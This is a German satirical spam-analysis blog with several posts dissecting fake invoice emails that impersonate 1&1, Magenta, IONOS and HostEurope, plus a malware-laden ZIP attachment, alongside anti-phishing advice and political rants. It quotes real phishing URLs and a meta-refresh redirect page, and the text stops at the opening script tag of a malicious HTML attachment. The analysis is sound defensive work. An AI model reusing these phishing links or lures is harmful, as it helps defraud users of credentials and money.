Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Schlagwortarchiv „Rechnung“

Ihre 1&1 Rechnung

Dienstag, 24. September 2024

Aber ich habe gar nix mit 1&1 zu tun. Diese Mail kommt auch gar nicht von 1&1, was man übrigens schon…

Von: 1&1 Kundenservice <contact@inselhof-vineta.de>

…an der Absenderadresse sieht. Die folgende Mail ist keine „Rechnung“, wie der Betreff denken lassen soll, sie ist eine Spam:

1&1 Kundenservice

IHRE 1&1 RECHNUNG

Guten Tag Madeleine Klemm,

Zumindest in meinem Fall stimmt der Name nicht. Da stimmt noch nicht einmal das Geschlecht. Ich gehe aber davon aus, dass der Name nur ein Platzhalter ist und dass die Spammer zu vielen Mailadressen auch einen Namen haben. Der gegenwärtige Industriestandard des Datenschutzes macht es möglich.

Ihre neue Rechnung vom 23.09.2024 über 24,95 EUR liegt für Sie im 1&1 Control-Center bereit:

» Ihre 1&1 Rechnung

Der Link führt natürlich nicht in die Domain von 1&1, wo zum Beispiel auch die Website liegt, sondern in die Cloud von Amazon. Dort gibt es dann erstmal…

$ lynx -source https://loginihrerechnung.s3.amazonaws.com/NCHYUUF.html
<!DOCTYPE html>
<html>
<head>
   <title></title>
   <meta http-equiv="refresh" content="0; url = http://manalanabg.temp.swtest.ru/5440145/570757/dssdfsfezflu" />
</head>
$ _

…eine Weiterleitung zu einer Website in einer russischen Domain. Wenn ich den Link in diese Domain mit etwas anderem als einem aktuellen Desktopbrowser untersuchen will, bekomme ich regelmäßig eine Weiterleitung auf die Startseite von Google. Nur mit einem Desktopbrowser – ich empfehle für solche Experimente mit Links aus einer Spam mindestens die Verwendung einer virtuellen Maschine, denn es handelt sich um Websites von Kriminellen, auf denen man sich alles mögliche einfangen könnte – bekommt man eine andere Weiterleitung und auch etwas zu sehen, und zwar das hier:

Screenshot der Phishing-Site: Eine nachgemachte Anmeldung bei Ionos

Oh, Ionos ist 1&1? 😂️

Natürlich gehen die Anmeldedaten und alles, was man danach eingibt, direkt zu Trickbetrügern, die sich nicht einmal besonders viel Mühe gegeben haben. Es handelt sich um Phishing.

Sie möchten Ihre Rechnung lieber als Anhang per E-Mail erhalten? Das können Sie ganz einfach hier aktivieren.

Dieser Link führt wirklich in die Website von 1&1. Vermutlich wurde er aus einer echten Mail übernommen.

Den offenen Betrag buchen wir am 30.09.2024 von Ihrem Konto ab.

Klar doch! Macht mal, Spammer! 🤭️

Wussten Sie schon?

Alle wesentlichen Fragen rund um Rechnungen haben wir im 1&1 Hilfe-Center für Sie beantwortet. Dort finden Sie auch ein How-to-Video und hilfreiche Infos, z. B. zu Rechnungen nach einem Tarifwechsel.

Im 1&1 Control-Center oder per App (Android | iOS) können Sie außerdem:

Einzelverbindungsnachweise aktivieren oder
Vertragsdaten prüfen/aktualisieren

Ich wünsche Ihnen weiterhin viel Freude mit den Leistungen von 1&1.

Freundliche Grüße aus Montabaur

Ihr Jörg Schur

Jörg Schur

Leiter 1&1 Kundenservice

Ich nehme an, dieser ganze Teil und die darauf folgenden Texte, in denen es ganz viele Möglichkeiten gibt, einen Link zu klicken, wurden ebenfalls aus einer echten Mail übernommen.

Das ist eine weitere gute Gelegenheit, darauf hinzuweisen, dass es einen sehr einfachen und hundertprozentig sicheren Schutz vor Phishing gibt, einer der häufigsten Trickbetrugsformen im gegenwärtigen Internet: Niemals in eine E-Mail klicken! Wenn man nicht in eine E-Mail klickt, kann einem nicht so leicht jeder dahergelaufene Schurke einen giftigen Link unterschieben. Stattdessen für häufiger besuchte Websites, bei denen man ein Benutzerkonto hat, immer ein Lesezeichen im Webbrowser anlegen und diese Websites nur noch über das Lesezeichen aufrufen! Dann ganz normal dort anmelden. Die Behauptungen in solchen Spams lösen sich dabei immer in Wohlgefallen auf, denn auf der Website sieht man keine entsprechenden Hinweise. Und dann hat man einen dieser gefürchteten „Cyberangriffe“ abgewehrt. So einfach geht das! Macht das! 🛡️

Es ist natürlich nur eine Vermutung von mir, dass bei dieser Spam eine echte Mail von 1&1 als Vorlage diente, denn ich weiß nicht, wie die echten Mails aussehen und kenne auch niemanden, der Kunde bei 1&1 ist. Aber wenn diese Vermutung zutrifft, bin ich erschrocken darüber, wie sehr ein Internetdienstleister, der sicherlich jeden Tag etwas von der Kriminalität im Internet mitbekommt, seine Kunden daran gewöhnt, dass sie in E-Mail klicken. Statt sie davor zu warnen.

[Info] 225079921

Donnerstag, 11. Januar 2024

Na, das ist doch ein toller Betreff! Mit Nummer. Muss wichtig sein. Und mit Hinweis, dass es eine Information ist. Hätte ich bei einer Mail nicht gedacht, dass die mir etwas mitteilen will. 🥳️

Hier, Spammer, falls dir mal diese wichtig aussehenden Nummern ausgehen sollten, ich habe hier noch ein paar für dich¹:

$ perl -e 'for $i (1 .. 18) { printf "%9d%s", rand 1e9, $i % 6 ? " " : "\n"; }'
404745672 202924336 676814504 628657014 651344584 246307224
615669955 208919879 607325795 579170566 657992034   9089662
340917653 693530720  82151037 771577998 483175009 776267151
$ _

Wer schreibt mir überhaupt?

Von: © Ihre Rechnung Magenta <mailrobot@mail.xing.com>

Oh toll, mir schreibt das Copyright an Magentarechnungen. Dabei habe ich gar nichts mit Magenta zu tun, und ich habe auch ganz sicher nicht deren Urheberrecht an Rechnungen verletzt. Ich bin doch kein Spammer und Betrüger.

Ihre Rechnung
Wir hatten Schwierigkeiten, den Betrag der letzten Rechnung einzuziehen.

Das kann ich mir vorstellen. Die Deutsche Telekom hat nämlich gar keine Möglichkeit, etwas von mir einzuziehen. Und so lange ich keinen Vormund habe, der die Entscheidungen für mich trifft, ohne dass ich etwas dagegen tun könnte, wird das auch so bleiben. Die Restbestände der Deutschen Bundespost und insbesondere die abzockerische Telekom dürfen meinetwegen einfach ersatzlos vom Markt verschwinden. Nicht, dass der Mitbewerb in der Bundesrepublik Deutschland viel besser wäre, aber was die Telekomiker sich so rausgenommen haben und immer noch rausnehmen – und nein, das waren keine bedauerlichen Einzelfälle, ich habe es über Jahrzehnte hinweg (auch schon in den Zeiten der Bundespost) auch immer wieder von anderen gehört und ich höre es bis heute – zeigt schon eine besondere und sehr vorsätzliche Boshaftigkeit als Grundpfeiler der Unternehmenskultur. Zumindest in der Bundesrepublik Deutschland. Wohl dem, der eine Rechtsschutzversicherung hat! Das dämpft wenigstens die unvermeidbaren Rechtskosten ein bisschen, wenn man mal wieder genötigt, gegängelt, offen belogen oder fies abgezockt wird. Die um Quatschgebühren ergänzten weltrekordverdächtigen Wuchertarife für technische Minderleistungen, wie sie bei den Deutschen Telekomikern üblich sind und von den Menschen in der Bundesrepublik Deutschland bezahlt werden, weil die Menschen sich wegen der unternehmensverhätschelnden und bevölkungsverachtenden Politik der hochkorrupten Europäischen Union ihren Provider leider nicht beliebig am europäischen Markt aussuchen können, werden davon allerdings auch nicht angemessener. Und morgen läuft wieder in der Talkshow, dass die Märkte das alles zu unserem Besten regeln sollen, unter Applaus aus dem Lügenmund eines Subventionskaspers unserer Classe politique gequollen… 🤮️

Ach ja, und aufs Fernsehen verzichte ich schon seit 36 Jahren, ohne dass ich einen Mangel empfinde. Meiner geistigen Gesundheit zuliebe. Nachdem die mit Abstand beste Sendung – das Testbild – eingestellt wurde und es nur noch Dauerwerbesendungen mit Brüllsport, unfassbar dümmliche Verdummungsunterhaltung, Clowns aller Art und jede Menge professionell aufgekochter Gefühle in Dokumentationen, Magazinen und vorgeblich politischen Formaten gibt, wird sich daran auch nix ändern. Manchmal bekomme ich am Rande dieses industrielle Hirngemetzel der so genannten Talkshows im Quasistaatsfunk mit, und dann gruselt es mir richtig. Dann denke ich mir, dass es in den Achtziger Jahren doch noch deutlich besser war. Aber es war damals schon völlig unerträglich für einen intelligenzbegabten Menschen. Deshalb wollte ich es ja auch nicht mehr ertragen.

Oh, ich schreibe ja eigentlich über eine Spam. 😉️

Aufgrund eines Problems mit Ihrer Zahlungsmethode konnten wir Ihre Zahlung diesen Monat nicht einziehen.

Was ist denn „meine Zahlungsmethode“? Ach, das wisst ihr gar nicht? Und von welchem Konto wolltet ihr meine Zahlung angeblich einziehen? Ach, das wisst ihr gar nicht? Ein richtiges größeres Unternehmen, dass seine Kunden zum Beispiel nach einem fehlgeschlagenen Bankeinzug mit einer Mahnung „beglückt“, würde das im Text erwähnen. Es hat ja ein völlig nachvollziehbares Interesse daran, schnell und ohne lange Nachfragen an sein Geld zu kommen… 💰️

Aber ein richtiges größeres Unternehmen würde ja auch seine Kunden namentlich ansprechen und eine Vertragsnummer zu seinen Rechnungen dazuschreiben, falls jemand mal mehrere Verträge hat. In einer besseren Welt als der unsrigen würde es seine Mails auch digital signieren, aber die Benutzung von ausgereifter Software, die seit mehr als dreißig Jahren jedem Menschen kostenlos und Frei zur Verfügung steht, ist hier ja praktisch allen Unternehmen zu kompliziert. Die verhökern dann lieber ihre Kunden an irgendwelche Trickbetrüger, statt ihren Kunden wenigestens die Chance zu geben, sich durch klicki-klicki Überprüfung einer digitalen Signatur vor derartigen Überrumpelungen zu schützen. Und im Fernsehen heißt es dann „Cyber Cyber“. 😠️

Um den Bezahlvorgang abzuschließen, müssen Sie sich im Kundenservice anmelden.

öffnen sie die Rechnung

Gesamtbetrag : 15,79 euro
Rechnungsnummer: 225079921

Oh, der Link geht aber gar nicht zu den Telekomikern, sondern zur Suchmaschine „bing“. Diese wird aber nur für eine Weiterleitung benutzt.

$ lynx -dump 'http://www.bing.com/ck/a?!&&p=03db64b84710c756JmltdHM9MTcwNDA2NzIwMCZpZ3VpZD0zMTZkYTVkNS0wNWY2LTZkYmMtMjFhMS1iNjJmMDRjOTZjZGEmaW5zaWQ9NTE0NA&ptn=3&ver=2&hsh=3&fclid=316da5d5-05f6-6dbc-21a1-b62f04c96cda&u=a1aHR0cHM6Ly90cmllZGx5LmNvbS8&ntb=1'
   Please [1]click here if the page does not redirect automatically …

Verweise

   1. https://www.bing.com/ck/a?!&&p=03db64b84710c756JmltdHM9MTcwNDA2NzIwMCZpZ3VpZD0zMTZkYTVkNS0wNWY2LTZkYmMtMjFhMS1iNjJmMDRjOTZjZGEmaW5zaWQ9NTE0NA&ptn=3&ver=2&hsh=3&fclid=316da5d5-05f6-6dbc-21a1-b62f04c96cda&u=a1aHR0cHM6Ly90cmllZGx5LmNvbS8&ntb=F
$ lynx -dump 'https://www.bing.com/ck/a?!&&p=03db64b84710c756JmltdHM9MTcwNDA2NzIwMCZpZ3VpZD0zMTZkYTVkNS0wNWY2LTZkYmMtMjFhMS1iNjJmMDRjOTZjZGEmaW5zaWQ9NTE0NA&ptn=3&ver=2&hsh=3&fclid=316da5d5-05f6-6dbc-21a1-b62f04c96cda&u=a1aHR0cHM6Ly90cmllZGx5LmNvbS8&ntb=F'
   REFRESH(1 sec): [1]"https://manegta.com/AT/"

Verweise

   1. "https://manegta.com/AT/"
$ surbl manegta.com
manegta.com	okay
$ _

So so, „Manegta“ also. 😂️

Die Domain steht leider noch nicht auf den Blacklists. Dieses Schlangenöl, dass der Webbrowser vor bekannten Phishingsites warnt, ist hier also wirkungslos. Die Domain mit dem Buchtsabenderher für diesen Betrug ist also ziemlich frisch.

Ich schaue mir das jetzt inhaltlich nicht weiter an.

Ich gebe hier nur meinen Standardhinweis, auch auf die Gefahr hin, dass ich regelmäßige Leser damit langweile: Wer sich auf Schlangenöl verlässt, das „Sicherheit“ verspricht, ist oft verlassen. Zum Glück für uns alle gibt es aber einen ganz einfachen, kostenlosen, ohne zusätzliche Software auskommenden und hundertprozentig wirksamen Schutz vor derartigen Betrugsversuchen: Niemals in eine E-Mail klicken! Wenn man sich für jedes Unternehmen, mit dem einen Vertrag hat und für jede Website, bei der man ein Benutzerkonto hat, einfach mit flinkem Klick ein Lesezeichen im Webbrowser anlegt und sich angewöhnt, diese Websites nur über dieses Lesezeichen aufzurufen, kann einem kein Krimineller einen giftigen Link unterschieben. Wenn man eine Spam wie die hier zitierte empfängt und sich trotz der relativ deutlichen Anzeichen für den Betrugsversuch nicht völlig sicher ist, ob sie vielleicht doch echt sein könnte (die Telekomiker haben auch oft einen fragwürdigen Stil), dann klickt man nicht in die Mail, sondern ruft man die Website von Magenta über das Lesezeichen im Browser auf und meldet sich dort wie gewohnt an. Wenn sich nach der Anmeldung kein Hinweis auf das in der Mail behauptete Problem zeigt, dann hat man einen dieser gefürchteten Cyberangriffe abgewehrt. So einfach geht das. Bitte, macht das! 🛡️

Es ist übrigens nicht einmal ein Komfortverlust. Es wird ja einfach nur geklickt, nur eben nicht mehr auf einen Link, dem einen ein Verbrecher nach Belieben unterschieben kann, sondern auf ein Lesezeichen, das man selbst eingerichtet hat. 🖱️

Nutzen Sie schon Mein Magenta – Ihr Online Kundenportal?

Sie können damit jederzeit

  • Ihre Daten aktualisieren
  • Ihre letzten 12 Rechnungen einsehen
  • Rechnungen mit einer elektronischen Signatur anfordern

Falls Sie Mein Magenta noch nie genutzt haben, registrieren Sie sich bitte zuerst.

Wie, ich hätte als Kunde eines Internetdienstleisters nicht einen automatischen Zugriff auf die Angebote der Website dieses Dienstleisters, sondern müsste mich dafür erstmal separat „registrieren“? Stimmt das wirklich? Habe ich weiter oben etwas leicht Despektierliches über die Telekomiker geschrieben… ich glaube, ich habe es noch viel zu milde ausgedrückt. Ach! 🤬️

Haben Sie weitere Fragen?
Dann besuchen Sie uns unter magenta.at/service.

Schon lustig, dass die angeblichen Telekomiker dafür keinen Link mehr setzen konnten, sondern nur einen Link auf die angebliche Rechnung.

Entf! 🗑️

¹Liebe Kinder, wenn ihr größere Perlprogramme schreibt, setzt in solchen Zeilen bitte ein paar Klammern, auch wenn sie syntaktisch nicht nötig sind. Perl bleibt auch mit diesem bisschen Mühe schwierig genug zu dechiffrieren.

Dringende Zahlungserinnerung für Rechnungsnummer 59679633

Montag, 16. Oktober 2023

Oh, schön, eine Rechnungsnummer wird an die Zahlung erinnert. Gefällt mir viel besser, als wenn ich daran erinnert würde.

Anders, als der mit sehr geringer Kunstfertigkeit angegebene Absender suggerieren soll…

Von: lONOS <contact-6cae7c3d@propriete-a-vendre.com>
An: gammelfleisch@tamagothi.de

…kommt diese Mail nicht von IONOS und auch nicht von „lONOS“ (mit einem kleinen „L“ anstelle eines großen „I“). Das sieht man auch sofort, wenn man kurz auf die dazu angegebene Mailadresse schaut. IONOS hat doch tatsächlich eine eigene Domain. Wer hätte das bei einem Hostingdienstleister schon erwartet, dass er eine eigene Domain hat? 😂️

Es ist eine Spam. Nichts, was darin steht, stimmt. Vergleichbare Spams, die von einem in Kürze bevorstehenden Ablauf einer Domain sprechen, wenn man nicht bezahlt, gibt es auch im gefälschten Namen von HostEurope, heute zur Abwechslung mal als „H0stEurope“ mit einer „0″ anstelle eines „O“ geschrieben. Nicht darauf reinfallen! Die Spam einfach löschen! Auf keinen Fall in die Spam klicken! Und in Zukunft bitte dafür sorgen, dass man nie wieder auf Phishing, eine der häufigsten Trickbetrügereien im Internet, hereinfallen kann. Wie man sich vor Phishing schützt, habe ich bereits gestern geschrieben, als mich angeblich „HostEurope“ auf die bevorstehende Kündigung einer Domain aufmerksam machte. Es ist zum Glück nicht so schwierig, erfordert keine technischen Kenntnisse, verlangt kein Erlernen abstrakter Zusammenhänge und kostet auch kein Geld. 🛡️

Dringende Zahlungserinnerung für Rechnungsnummer 59679633

Hey, Spammer, das hast du schon im Betreff gesagt. Das habe ich also schon zur Kenntnis genommen, wenn ich die Mail lese. Die Wiederholung hier ist völlig redundant und bläht nur den Text auf, damit er nach mehr aussieht. 🦕️

Und die dumme Nummer mit der Nummer ist eine dumme Nummer, denn die Nummer sagt mir gar nichts. Sie sagt niemanden etwas. Weder einen Rechnungsbetrag, noch einen Rechnungsgegenstand, noch irgendetwas. Sie ist genau so sinnvoll wie die Meldung der Lottozahlen für einen Menschen, der nicht Lotto spielt. Oder wie die Meldung der Börsenkurse für einen Menschen, der keine Aktien hat. Übrigens bist du so eine kleine Nummer, Spammer, dass du in allen fünf Spams, die sich heute bei mir im Glibbersieb verfangen haben, die gleiche Nummer benutzt. Das ist nicht sehr schlau. Vielleicht solltest du dir mal von einem aufgeweckten Zehnjährigen erklären lassen, wie man mit einem Computer ein paar Ziffernfolgen generieren kann:

$ perl -e 'for $i (1..10) { printf "%08d%s", rand(1e8), ($i % 5 == 0 ? "\n" : " ") }'
35433509 78038448 70517334 41882983 09631461
98998352 41930248 83232968 68010228 95408921
$ _

Ist doch gar nicht so schwierig! 😉️

Sehr geehrter Kunde,

Wenn man nach Angabe einer präzisionsheuchelnden Nummer so genau bei seinem Namen angesprochen wird, kommt die Zuckung im Löschfinger ganz von allein. 🗑️

Wir müssen Sie dringend daran erinnern, dass die Zahlung für die Rechnungsnummer 59679633, fällig am 30/09/2023, immer noch aussteht. Wir haben bisher noch keinen Zahlungseingang von Ihnen verzeichnen können.

Vor allem müsst „ihr“ euch mal mit dem Datumsformat vertraut machen, das in dem Sprachraum üblich ist, den ihr mit eurer Spam abdecken und betrügen wollt. Hier würden die meisten Menschen 30. 9. 2023 schreiben, und einige Menschen würden nach DIN 5008 die viel bessere und logischere Schreibweise 2023-09-30 verwenden. Wenn diese nicht genau andersherum wäre, wie wir ein Datum sprechen, hätte sie sich wohl schon längst überall durchgesetzt. Was aber wirklich niemand freiwillig im deutschen Sprachraum macht, ist, Querstriche zwischen die Komponenten eines Datums zu setzen – außer, jemand verwendet Microsoft Office, macht einen Serienbrief mit Microsoft Word und holt sich die Daten für den Serienbrief aus Microsoft Excel. Dann kommt es von allein zu genau dieser völlig falschen und überdem hässlichen Schreibweise¹. Und nur dann. Und aus den üblichen Fiesheitsgründen auch völlig unabhängig davon, welches Datumsformat Excel in der Tabelle anzeigt. Das Datum so falsch in einem Dokument zu haben und zu dumm zu sein, anschließend nicht das Feld anzupassen, ist also vor allem ein peinliches Insignium von Inkompetenz, Lernunwillen und Gleichgültigkeit. Jeder Mensch, der täglich mit Microsoft Office arbeitet und einen gewissen Anspruch an seine eigene Arbeit hat, kann und macht das besser. 💩️

Habe ich eigentlich schon erwähnt, dass diese Spam nicht von IONOS kommt? 😁️

Diese Rechnung ist von entscheidender Bedeutung, da sie die Erneuerung Ihres Domainnamens tamagothi.de betrifft.

Natürlich wird die benannte Domain nicht bei IONOS verwaltet. Aber bei einigen Menschen wird das schon passen, und die machen dann etwas sehr Dummes:

Um sicherzustellen, dass Ihre Domain nicht abläuft, bitten wir Sie eindringlich, die Zahlung so schnell wie möglich zu tätigen.
Jetzt bezahlen

Sie klicken in eine Spam. 🖱️🚫️

Wir möchten darauf hinweisen, dass eine Verzögerung bei der Bezahlung dazu führen kann, dass Ihre Domain vorübergehend deaktiviert wird.

Wer die von Spammern gewünschte Panik entwickelt und auf den Link klickt, landet nicht auf der Website von IONOS, sondern auf einer Website von Spammern, Phishern und Betrügern. Alle Daten, die man dort angibt – gestern fing es gleich mit einem Vollzugriff auf die Kreditkarte an – gehen direkt an Kriminelle. Bevor man auch nur richtig verstanden hat, was für einen dummen Fehler man gemacht hat, ist der Schaden schon groß, teuer und nachhaltig. 💸️

Deshalb klickt man nicht in E-Mail. Wer sich für die Website seines Hosters (seiner Bank, seiner bevorzugten Einzelhändler, häufig besuchter anderer Websites, etc.) einfach ein Lesezeichen im Webbrowser anlegt und diese Website nur über dieses Lesezeichen aufruft, kann nicht so leicht einen giftigen Link untergeschoben kriegen. Macht das, und ihr seid vor einer der häufigsten Formen des Trickbetrugs im Internet sicher. 🛡️

Bei Fragen oder Problemen sind wir gerne für Sie da. Kontaktieren Sie uns einfach per E-Mail.

Das ist aber nett. Ich will jetzt aber nicht ausprobieren, was passiert, wenn man auf diese Mail antwortet. 🙃️

Wir hoffen auf Ihre prompte Zahlung und bedanken uns im Voraus für Ihr Verständnis und Ihre Kooperation.

Danke für den Dank für Nichts! 🖕️

Mіt frеundlісhеn Grüßеn
Kundеnѕеrvісе Ionos

support@ionos.de

© 2004–2023 Ionos

Auch von mir ein Winkewinke, Spammer! Und jetzt geht euer Müll wieder in den Müll, wo er hingehört und wo ich ihn rausgeholt habe. 🗑️

¹Ich habe lange kein Microsoft Office mehr für irgend etwas benutzt und ich würde diese gärende Datenjauche auch nur noch gegen Vorauszahlung erheblichen Schmerzensgeldes anfassen. Das hier beschriebene, für die meisten Anwender etwas eigenwillige und komplett unverständliche Verhalten im Zusammenspiel zwischen Word und Excel gibt es offenbar immer noch. Ich sehe den Fehler zumindest öfter mal auf Papier gedruckt, und zwar auch dort, wo ich einen einigermaßen aktuellen Softwarestand erwarten würde. Wie ganz viele andere Ärgernisse und kleine Fehler in Microsoft Office auch, die den Menschen seit rd. dreißig Jahren lauter lustige Übelraschungen in den Alltag tragen – es war offensichtlich für Microsoft in der letzten Zeit wichtiger, die Benutzerschnittstelle widerspenstiger und unbenutzbarer zu machen und lauter Funktionsmerkmale einzubauen, die niemals jemand vermisst hat, als einfach mal die Grundfunktionen so zu implementieren, dass sie auch einem Menschen ohne vertiefte Kenntnisse problemlos und natürlich zur Verfügung stehen. Wer dieses Problem hat und ein normales Datumsformat verwenden will, muss in seinem Worddokument für den Serienbrief das entsprechende Feld mit der rechten Maustaste anklicken und im Kontextmenü „Feldfunktionen ein“ auswählen. In dem nun sichtbaren, grau hinterlegten Feld kann man dann vor der schließenden geschweiften Klammer \@ "dd.MM.yyyy" schreiben (ja, genau so!) und erhält ein besseres Datumsformat. Ich wünsche auch weiterhin viel Spaß mit moderner und benutzerfreundlicher Software von Microsoft! Die ist modern und benutzerfreundlich. Vor allem die Benutzer müssen stets sehr freundlich sein…

Revize fatura

Mittwoch, 19. Oktober 2022

Oh, jetzt werde ich schon auf Türkisch¹ zugespammt? 🤨️

Merhaba

Normalerweise würde ich ja sagen: Genau mein Name! Aber heute sage ich mal: Genau meine Sprache! 🤭️

Fatura önceden onaylandı, lütfen imzalayın ve geri gönderin, böylece ödemelerin ödenmesine başlayalım

İyi iş

Was für eine Rechnung denn? Ich habe nichts gekauft und nichts bestellt. Und wenn der Absender wirklich wollte, dass man eine Rechnung bezahlt, dann würde er schon den Rechnungsbetrag und die Bankverbindung in den Text der Mail schreiben. 🤔️

Aber stattdessen muss ich hier einen Anhang öffnen, wenn ich wissen will, wofür ich wieviel an wen bezahlen soll und um was zum hackenden Henker es überhaupt geht. Einen Anhang in einer E-Mail eines Unbekannten (der Absender kann beliebig gefälscht werden) zu öffnen, ist dumm und gefährlich. ⚠️

Zisan DEMIR
SEMKİM Paint and Chemistry Inc.
Kemalpasa OSB mah. 508 St. No:320
P: 35730; Kemalpasa / IZMIR
M: +09 532 621 ■■■■
T: +90 232 878 ■■■■■
zisandemir@semkim.com.tr
www.semkim.com.tr

Ich bin übrigens der Weihnachtsmann. 🎅️

Es ist hoffentlich jedem Menschen klar, dass ein Krimineller in ein solches Mailimpressum beliebige Daten anderer Menschen und Unternehmen angeben kann. Bei Semkim möchte ich heute jedenfalls nicht am Telefon sitzen, denn ich bin ganz sicher nicht der einzige Empfänger dieser Spam, und das Telefon wird wohl ordentlich bimmeln. Dass dadurch wirtschaftlicher Schaden bei einem unbeteiligten Dritten entsteht, ist einem asozialen kriminellen Spammer egal, wenn dabei nur sein asoziales Geschäft läuft. 🤮️

An der Mail hängt auch nicht etwa ein Dokument, sondern ein ZIP-Archiv mit einer Dateigröße von 241,7 KiB. In diesem Archiv befindet sich auch kein Dokument, sondern…

$ ls -lh *.zip
-rw-rw-r– 1 elias elias 242K Okt 19 15:08 'Revize fatura.zip'
$ unzip -l Revize\ fatura.zip
Archive:  Revize fatura.zip
  Length      Date    Time    Name
———  ———- —–   —-
   261699  2022-10-19 04:53   Revize fatura.exe
———                     ——-
   261699                     1 file
$ unzip Revize\ fatura.zip 
Archive:  Revize fatura.zip
  inflating: Revize fatura.exe       
$ file Revize\ fatura.exe 
Revize fatura.exe: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
$ _

Gruseliges Bild, das mit Stable Diffusion erzeugt wurde…eine ausführbare Datei für Microsoft Windows, die von einem Unbekannten mit einer Lüge zugestellt wurde. Auch, wenn das Piktogramm des Programmes sicherlich wie ein Dokument aussehen wird², damit überhaupt jemand darauf reinfällt: Ein Doppelklick auf die entpackte Datei öffnet kein Dokument, sondern führt das Programm eines Kriminellen aus. Danach steht ein Computer anderer Leute auf dem Schreibtisch. ☹️

Antivirus-Programme helfen nur sehr eingeschränkt. Im Moment wird die klare Schadsoftware nur von einem Fünftel der Antivirus-Programme als Schadsoftware erkannt. 😵️

Wer sich darauf verlässt, durch sein Antivirus-Programm geschützt zu sein, ist in vielen Fällen verlassen. Und das gilt leider sehr regelmäßig. Antivirus-Programme können nur vor Schadsoftware schützen, die bei den Herstellern der Antivirus-Programme schon bekannt ist. Selbst eine für einen analysierenden Menschen sehr ähnlich aussehende Schadsoftware wird regelmäßig nicht erkannt. In solchen an Kleingewerbe und Mittelstand gerichteten Spams wird beinahe immer die neueste Brut der Kriminellen versendet. Denn die Kriminellen sind darauf angewiesen, dass sie Rechner mit ihrer Schadsoftware übernehmen. Sie leben davon. Deshalb wissen solche Kriminelle auch immer recht genau, was von Antivirus-Programmen nicht erkannt wird. Weil sie davon leben, dass es nicht erkannt wird. 😠️

Man kann sich das Antivirus-Schlangenöl in sehr vielen Fällen einfach sparen, wenn man stattdessen vernünftig und sicher mit einem Computer umgeht. Wie man das macht? Das habe ich schon im zuvor verlinkten Text beschrieben. Es ist auch gar nicht so schwierig. Ein sehr wichtiger Bestandteil des vernünftigen und sicheren Umgangs mit Computern ist es, dass man niemals einfach in eine E-Mail klickt. Das schützt nicht nur vor Schadsoftware, sondern auch vor Phishing, dem immer noch häufigsten Trickbetrug im Internet. E-Mail ist sehr praktisch, aber leider auch für Kriminelle. 😐️

Wer sein Gehirn benutzt und einfach keine Anhänge öffnet und keine Links klickt, die ihm per E-Mail zugestellt werden, ohne dass dies über einen anderen Kanal als E-Mail vereinbart wurde, ist auf der sicheren Seite. Es ist kaum möglich, eine giftige Datei unterzuschieben. 🛡️

Noch besser und praktischer im Alltag wäre nur die durchgehende Benutzung (und Überprüfung) digitaler Signaturen, um immer jenseits jedes vernünftigen Zweifels zu wissen, von wem eine E-Mail stammt³. Aber das ist den Menschen leider auch im Jahr 2022 noch zu kompliziert, denn dafür muss man ja klicken können. 🖱️

Erpresser, die Daten verschlüsseln und ein Lösegeld für die Daten erpressen wollen, freuen sich sehr darüber, wenn möglichst viele Menschen digitale Analphabeten sind. Ich meine dieses Wort übrigens nicht als Beschimpfung. Sie haben es einfach nicht gelernt, so wie man zum Beispiel Schreiben und Rechnen lernt, obwohl es eine wichtige Fähigkeit im 21. Jahrhundert wäre. Die tägliche digitale Verdummung von Menschen in Schule, Presse und Glotze ist Kriminalitätsförderung. Gestalten wie Frau Prof. Dr. Kristina Sinemus (CDU), Digitalministerin des Landes Hessen, nebst der korrupten Parteioligarchie, die so viel krachende Inkompetenz aus der lodernden Hirnhölle völliger Ahnungslosigkeit in Amt, Würden und vor allem in die Pfründe gehoben hat, sind offene und schamlose Kriminalitätsförderer. 🤬️

Aber die Verdummung wirkt ja ganz gut, denn so etwas wird leider trotzdem immer wieder gewählt. ☹️

¹Nein, ich kann trotz Ghetto-Sozialisation praktisch kein Türkisch (bis auf ein paar Phrasen und Schimpfwörter), aber DeepL ist sehr hilfreich…

²Ich habe hier kein Programm installiert, mit dem ich die Ressourcen aus einem Windows-Binary extrahieren kann, weil ich so etwas nicht brauche, und ich habe auch keine Lust, jetzt „auf die Schnelle“ ein entsprechendes Programm zu suchen. Ich gehe davon aus, dass entweder das Icon eines Office-Dokumentes oder das Icon eines PDF-Dokumentes verwendet wurde, um den Empfänger über den wahren Dateitypen zu täuschen. Man kann einem ausführbaren Programm für Windows jedes beliebige Icon geben. Diese Spammer leben davon, dass Menschen auf sie reinfallen.

³Eigentlich erfährt man nur, dass die E-Mail von jemanden stammt, der Zugriff auf einen bestimmten privaten Schlüssel hat und dass ihr Text auf dem Transportweg nicht verändert wurde – aber das wäre im Alltag mehr als nur ausreichend und ein hervorragender Ersatz für ein Nichts an rationalen Vertrauensgrundlagen. Die Absenderadresse einer E-Mail kann beliebig gefälscht werden. Man kann einfach reinschreiben, was man möchte, ohne dass das bemerkt wird. Ganz ähnlich, wie man auch auf einen Briefumschlag einen beliebigen Absender schreiben kann, und der Brief kommt trotzdem an.

Ihre Rechnung, Rechnungs-Nr.137784 vom 25.04.2022

Freitag, 29. April 2022

Nein, diese Mail kommt nicht von HostEurope. Es ist Phishing. ⚠️

Hallo ,

Ein Komma. Genau mein Name! 👍️

Ihre aktuelle Rechnung für Ihre Kundennummer 137784 vom 25.04.2022 steht für Sie auf

Das ist ja schön, dass die Rechnung für mich aufsteht. 😂️

Der sofort fällige Gesamtbetrag von 20,97 EUR wird Ihrem Konto in Kürze belastet. Der ausgewiesene Rechnungsbetrag wird mit ggf. vorhandenem Guthaben verrechnet.

Aha. Ich habe gegebenenfalls vorhandenes Guthaben, das verrechnet wird. So schade, dass die Computer, die im Auftrag des Hosters HostEurope Rechnungsmails versenden, nicht zum Rechnen imstande sind und mir nicht den korrekten Rechnungsbetrag anzeigen können. Vielleicht sollte HostEurope sich mal Rechner kaufen, die auch rechnen können. Das würde vieles vereinfachen. 🤣️

Ihre Rechnung liegt im HTML-Format vor und kann mit einem Mozilla Firefox, Google Chrome, Internet Explorer.

Sie kann übrigens auch mit einem Pale Moon, LibreWolf, Opera oder sonstigen Webbrowser. Aber bitte nicht mit einem Lynx oder einem Desktop-Browser, der kein Javascript ausführt, denn diese HTML-Datei ist kein HTML-Dokument, sondern…

$ cat Rechnung-137784.html 
<!DOCTYPE html>
<html lang="en">
<script language="javascript">
